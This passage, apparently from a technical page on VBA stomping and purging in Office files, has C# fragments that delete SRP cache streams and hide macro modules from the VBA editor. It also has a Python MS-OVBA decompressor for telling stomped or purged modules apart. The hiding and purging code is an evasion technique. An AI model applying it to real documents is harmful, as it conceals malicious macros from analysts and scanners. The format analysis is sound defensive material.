    // Check if document contains SRPs. Must be removed for VBA Purging to work.
    try
    {
        commonStorage.GetStorage("VBA").Delete("__SRP_0");
        commonStorage.GetStorage("VBA").Delete("__SRP_1");
        commonStorage.GetStorage("VBA").Delete("__SRP_2");
        commonStorage.GetStorage("VBA").Delete("__SRP_3");
        Console.WriteLine("\n[*] SRP streams deleted!");
    }

Modules can also be hidden from the VBA editor by removing their Module= lines from the project stream; ThisDocument and ThisWorkbook are left alone because the editor always shows them:

    // Hide modules from GUI
    if (optionHideInGUI)
    {
        foreach (var vbaModule in vbaModules)
        {
            if ((vbaModule.moduleName != "ThisDocument") && (vbaModule.moduleName != "ThisWorkbook"))
            {
                Console.WriteLine("Hiding module: " + vbaModule.moduleName);
                projectStreamString = projectStreamString.Replace("Module=" + vbaModule.moduleName, "");
            }
        }
        // Write changes to project stream
        commonStorage.GetStream("project").SetData(Encoding.UTF8.GetBytes(projectStreamString));
    }
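Stomping and purging both hinge on the layout of a module stream: PerformanceCache (the p-code) first, then, at the module's text offset from the dir stream, the CompressedSourceCode container in MS-OVBA compression. The block below is an added example (not the page's code and not any tool's): a decompressor for that container, a helper that splits a module stream at its text offset, and a builder for raw-chunk containers. The compressed container it decodes is hand-built here (one chunk with a copy token), so the script runs offline; with a real vbaProject.bin the same functions apply to the streams read out of the VBA storage.

```python
"""MS-OVBA compressed-container decompression and module-stream splitting."""
import struct


def decompress_ovba(buf: bytes) -> bytes:
    """Decompress an MS-OVBA container (signature 0x01, then 2-byte-headed chunks)."""
    if not buf or buf[0] != 0x01:
        raise ValueError("missing compressed-container signature 0x01")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(buf):
        header = struct.unpack_from("<H", buf, pos)[0]
        pos += 2
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError("bad chunk signature")
        chunk_size = (header & 0x0FFF) + 3            # total chunk size including the 2-byte header
        chunk_end = pos + chunk_size - 2
        chunk_start = len(out)
        if not header & 0x8000:                       # raw chunk: 4096 bytes copied as-is
            out += buf[pos:pos + 4096]
            pos += 4096
            continue
        while pos < chunk_end:
            flags = buf[pos]                          # one flag bit per following token
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not flags & (1 << bit):            # literal byte
                    out.append(buf[pos])
                    pos += 1
                    continue
                token = struct.unpack_from("<H", buf, pos)[0]
                pos += 2
                done = len(out) - chunk_start         # bytes produced so far in this chunk
                bit_count = max(4, (done - 1).bit_length())   # = max(4, ceil(log2(done)))
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                if offset > done:
                    raise ValueError("copy token reaches before the chunk start")
                for _ in range(length):               # byte-wise so overlapping copies work
                    out.append(out[-offset])
    return bytes(out)


def raw_container(data: bytes) -> bytes:
    """Container with a single uncompressed chunk (header 0x3FFF: flag 0, signature 0b011, size 0xFFF)."""
    if len(data) > 4096:
        raise ValueError("one raw chunk holds at most 4096 bytes")
    return b"\x01" + struct.pack("<H", 0x3FFF) + data.ljust(4096, b"\0")


def describe_module(stream: bytes, text_offset: int) -> dict:
    """Split a module stream at its text offset (MODULEOFFSET in the dir stream)."""
    return {"pcode_bytes": text_offset,               # PerformanceCache precedes the source
            "purged": text_offset == 0,               # purging leaves only the compressed source
            "source": decompress_ovba(stream[text_offset:]).decode("latin-1")}


# Hand-built container for "Sub a()\r\nEnd Sub\r\n": one compressed chunk, two flag bytes;
# copy token 0xC000 = offset 13 (bits 15..12 = 12, +1), length 3 (low 12 bits = 0, +3),
# i.e. "Sub" copied from 13 bytes back. Chunk data is 19 bytes, so size-3 = 18 -> header 0xB012.
SAMPLE_CONTAINER = (b"\x01" + struct.pack("<H", 0xB012)
                    + b"\x00" + b"Sub a()\r"          # flags 0x00: 8 literals
                    + b"\x20" + b"\nEnd "             # flags 0x20: 5 literals, copy token (bit 5), 2 literals
                    + struct.pack("<H", 0xC000) + b"\r\n")
SAMPLE_STREAM = b"\x00" * 64 + SAMPLE_CONTAINER       # 64 placeholder bytes stand in for the p-code

if __name__ == "__main__":
    print(describe_module(SAMPLE_STREAM, 64))
```

For a real file, open vbaProject.bin with olefile, decompress the VBA/dir stream (itself an MS-OVBA container) to get each module's MODULEOFFSET, and pass that offset with the module's stream to describe_module; a module whose decompressed source looks harmless but whose pcode_bytes is large is the stomping case, and pcode_bytes == 0 is the purged case.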
Reference: 文件的解析(一) (file format parsing, part 1)
https://www.cnblogs.com/mayswind/archive/2013/03/17/2962205.html
Kanxue ID: tobeabel
https://bbs.pediy.com/user-home-755584.htm